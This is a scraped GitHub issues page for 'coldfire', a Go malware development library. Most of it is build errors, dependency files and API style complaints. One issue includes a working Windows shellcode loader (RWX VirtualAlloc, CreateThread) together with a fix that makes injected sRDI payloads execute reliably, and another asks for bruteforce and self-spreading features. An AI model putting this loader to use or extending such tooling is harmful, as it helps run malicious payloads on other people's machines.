redcode-labs / coldfire Goto Github PK
View Code? Open in Web Editor NEWGolang malware development library
License: MIT License
Golang malware development library
License: MIT License
It would be very helpful if you could tag a release. This would enable distributions to fetch the source from GitHub instead of working with checkouts. Easier to track for package maintainer, too.
Thanks
go get github.com/redcode-labs/Coldfire: invalid github.com import path "github.com/redcode-labs"
mports github.com/redcode-labs/Coldfire
imports github.com/redcode-labs/Coldfire: import cycle not allowed
any help please ??
After updating Golang XENA has stopped working, more on that https://xena.network
I reproduced the following issue on two separate Linux machines running Arch-based distros.
Build command: go build .
Output:
# github.com/redcode-labs/Coldfire ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/net_linux.go:7:6: Networks redeclared in this block ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/net.go:179:6: other declaration of Networks ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/net_linux.go:25:53: undefined: syscall ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/net_linux.go:27:3: undefined: syscall ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/coldfire_linux.go:26:37: undefined: shellcode ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/coldfire_linux.go:29:30: undefined: shellcode ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/net.go:180:9: undefined: networks ../../../go/pkg/mod/github.com/redcode-labs/[email protected]/os.go:123:9: undefined: usrs
main.go:
` package main
import cf "github.com/redcode-labs/Coldfire"
func main() {
cf.B64E("asdasdasd")
}
`
go.mod:
`module main
go 1.22.0
require github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7
require (
github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e // indirect
github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770 // indirect
github.com/beevik/ntp v1.3.1 // indirect
github.com/c-robinson/iplib v1.0.3 // indirect
github.com/fatih/color v1.13.0 // indirect
github.com/go-sql-driver/mysql v1.7.1 // indirect
github.com/jackpal/gateway v1.0.7 // indirect
github.com/lib/pq v1.10.9 // indirect
github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f // indirect
github.com/mattn/go-colorable v0.1.11 // indirect
github.com/mattn/go-isatty v0.0.14 // indirect
github.com/mitchellh/go-homedir v1.1.0 // indirect
github.com/mitchellh/go-ps v1.0.0 // indirect
github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8 // indirect
github.com/yalue/elf_reader v1.0.0 // indirect
github.com/ztrue/tracerr v0.4.0 // indirect
golang.org/x/crypto v0.20.0 // indirect
golang.org/x/net v0.21.0 // indirect
golang.org/x/sys v0.17.0 // indirect
)
`
go.sum:
github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e h1:Bqtt5C+uVk+vH/t5dmB47uDCTwxw16EYHqvJnmY2aQc= github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e/go.mod h1:njRCDrl+1RQ/A/+KVU8Ho2EWAxUSkohOWczdW3dzDG0= github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770 h1:1KEvfMGAjISVzk3Ti6pfaOgtoC3naoU0LfiJooZDNO8= github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770/go.mod h1:QGzdstKeoHmMWwi9oNHZ7DQzEj9pi7H42171pkj9htk= github.com/beevik/ntp v1.3.1 h1:Y/srlT8L1yQr58kyPWFPZIxRL8ttx2SRIpVYJqZIlAM= github.com/beevik/ntp v1.3.1/go.mod h1:fT6PylBq86Tsq23ZMEe47b7QQrZfYBFPnpzt0a9kJxw= github.com/c-robinson/iplib v1.0.3 h1:NG0UF0GoEsrC1/vyfX1Lx2Ss7CySWl3KqqXh3q4DdPU= github.com/c-robinson/iplib v1.0.3/go.mod h1:i3LuuFL1hRT5gFpBRnEydzw8R6yhGkF4szNDIbF8pgo= github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= github.com/go-sql-driver/mysql v1.7.1 h1:lUIinVbN1DY0xBg0eMOzmmtGoHwWBbvnWubQUrtU8EI= github.com/go-sql-driver/mysql v1.7.1/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI= github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/jackpal/gateway v1.0.7 h1:7tIFeCGmpyrMx9qvT0EgYUi7cxVW48a0mMvnIL17bPM= github.com/jackpal/gateway v1.0.7/go.mod h1:aRcO0UFKt+MgIZmRmvOmnejdDT4Y1DNiNOsSd1AcIbA= github.com/lib/pq v1.10.9 h1:YXG7RB+JIjhP29X+OtkiDnYaXQwpS4JEWq7dtCCRUEw= github.com/lib/pq v1.10.9/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f h1:B0OD7nYl2FPQEVrw8g2uyc1lGEzNbvrKh7fspGZcbvY= github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f/go.mod h1:aEt7p9Rvh67BYApmZwNDPpgircTO2kgdmDUoF/1QmwA= github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= github.com/mattn/go-colorable v0.1.11 h1:nQ+aFkoE2TMGc0b68U2OKSexC+eq46+XwZzWXHRmPYs= github.com/mattn/go-colorable v0.1.11/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= github.com/mitchellh/go-ps v1.0.0 h1:i6ampVEEF4wQFF+bkYfwYgY+F/uYJDktmvLPf7qIgjc= github.com/mitchellh/go-ps v1.0.0/go.mod h1:J4lOc8z8yJs6vUwklHw2XEIiT4z4C40KtWVN3nvg8Pg= github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7 h1:iuk+l8Mt1IYimKfF9mdVJ9l7j0PMIdc/c3yvqqNbq2o= github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7/go.mod h1:xmkgqOYqT/PrBsS/zwfRV0iDky/5MwWhctqfd93xvHU= github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8 h1:ajJQhvqPSQFJJ4aV5mDAMx8F7iFi6Dxfo6y62wymLNs= github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8/go.mod h1:Nw/CCOXNyF5JDd6UpYxBwG5WWZ2FOJ/d5QnXL4KQ6vY= github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= github.com/yalue/elf_reader v1.0.0 h1:mJgyV2pk7Lm5BEfVbGrecaMLx6ZZuB/y8eAGm1Gln48= github.com/yalue/elf_reader v1.0.0/go.mod h1:2WMcv9f54UGq8H2MU4EHstdkSl0L0v2AycubDcDtpVU= github.com/ztrue/tracerr v0.4.0 h1:vT5PFxwIGs7rCg9ZgJ/y0NmOpJkPCPFK8x0vVIYzd04= github.com/ztrue/tracerr v0.4.0/go.mod h1:PaFfYlas0DfmXNpo7Eay4MFhZUONqvXM+T2HyGPpngk= golang.org/x/crypto v0.20.0 h1:jmAMJJZXr5KiCw05dfYK9QnqaqKLYXijU23lsEdcQqg= golang.org/x/crypto v0.20.0/go.mod h1:Xwo95rrVNIoSMx9wa1JroENMToLWn3RNVrTBpLHgZPQ= golang.org/x/net v0.21.0 h1:AQyQV4dYCvJ7vGmJyKki9+PBdyvhkSd8EIx/qb0AYv4= golang.org/x/net v0.21.0/go.mod h1:bIjVDfnllIU7BJ2DNgfnXvpSvtn8VRwhlsaeUTyUS44= golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20211003122950-b1ebd4e1001c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.17.0 h1:25cE3gD+tdBA7lp7QfhuV+rJiE9YXTcS3VG1SqssI/Y= golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= golang.org/x/term v0.17.0 h1:mkTF7LCd6WGJNL3K1Ad7kwxNfYAW6a8a8QqtMblp/4U= golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.
Looking at the source for the function and it appears the issue lies with CreateThread without calling WaitForSingleObject afterwards. I added the WaitForSingleObject
API and tested the payload and it seemed to fix the issue.
// ColdFire implementation
var bg_run uintptr = 0x00
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range shellcode {
ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
I have noticed that a lot of functions here are calling other functions with a different name.
This is actually unnecessary.
// IsRoot checks if the current user is the administrator of the machine.
func IsRoot() bool {
return isRoot()
}
// CmdOut executes a given command and returns its output.
func CmdOut(command string) (string, error) {
return cmdOut(command)
}
I hope you folks will remove such functions and de-bloatify the framework.
Hi
Can you please provide usage example for those of us that are new at golang.
This is what I have:
`package main
import "github.com/redcode-labs/ColdFire"
func main() {
coldfire.print_good("this is a test")
}`
The result is this:
./main.go:6:3: cannot refer to unexported name coldfire.print_good
./main.go:6:3: undefined: coldfire.print_good
Thanks for your time!
Hey, awesome work! Do you plan on bruteforce and additional spreading features?
TODO:
As listed in the TODO list above, some of the parts of code are inconsistent.
go vet
, go fmt
and go imports
.MustDoSomethin()
and then panic
on error. Note that in doc comment.@451208 as it comes out, I terribly suck at git - I had to sync the repo with my local version (as apparently Oyabun was throwing some compilation errors when latest, remote version of Coldfire was used) and I decided to force push due to the fact that merge was impossible. As it turns out, your valuable commit simply disappeared and I can't find it anywhere :< Can you please create another pull request with your modifications? I will try to merge it properly this time. Really sorry for the hassle.
Each time I attempt to go get -u the package I get the following error:
go get -u github.com/redcode-labs/Coldfire
package github.com/minio/minio/pkg/disk: cannot find package "github.com/minio/minio/pkg/disk" in any of:
/usr/local/Cellar/go/1.14.5/libexec/src/github.com/minio/minio/pkg/disk (from $GOROOT)
/Users/zephr/go/src/github.com/minio/minio/pkg/disk (from $GOPATH)
Any suggestions on how to remediate?
Version of Go: go version go1.14.5 darwin/amd64
Two tokens should be created and put inside the secrets settings in the repo:
GITHUB_TOKEN
- allows running of automated testsCODECOV_TOKEN
- allows automatic uploads of test results to the CodeCovA declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.